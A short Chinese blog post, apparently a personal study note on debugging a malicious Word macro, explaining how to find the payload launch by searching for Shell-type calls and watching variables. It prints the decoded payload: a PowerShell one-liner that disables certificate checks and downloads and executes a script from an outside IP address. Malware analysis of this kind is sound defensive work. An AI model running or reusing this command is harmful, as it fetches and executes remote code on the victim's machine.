刘收获

导航

恶意宏学习备忘04——恶意宏调试记录

记录某次恶意宏分析

样本来源:https://mp.weixin.qq.com/s/xzO3pG45CNN-HGKDokI92A

 

可以用取巧的方式来进行宏调试,纯粹的宏能做到事情实际上是有限的,一般是对文档或 模板的操作。而宏病毒往往是作为payload的载体,通过创建其他例程,释放运行payload。无论宏病毒前面执行了 多么复杂的操作,最后肯定会运行payload,而运行payload的方式可能是Shell、WScript.Shell、Application.Run等 (以及前面提到的winmgmts方式),我们可以直接搜索这些字符串迅速定位到运行payload的地方。 在本例中,搜索“Shell”

直接鼠标左键断点下到shell语句,右键“添加监控”监视shell语句后的变量

(实际操作中通过oledump.py导出的宏代码编译不通过,把那些显示红色高亮的指令删除就可以了)

 

"powershell.exe -nop [System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true};iex (New-Object System.Net.WebClient)
.DownloadString('https://23.227.194.58/'+(-join ((97..122) | Get-Random -Count 7 | % {[char]$_}))+'.png')"

  

 

posted on 2019-08-09 17:19  沉疴  阅读(249)  评论(0编辑  收藏  举报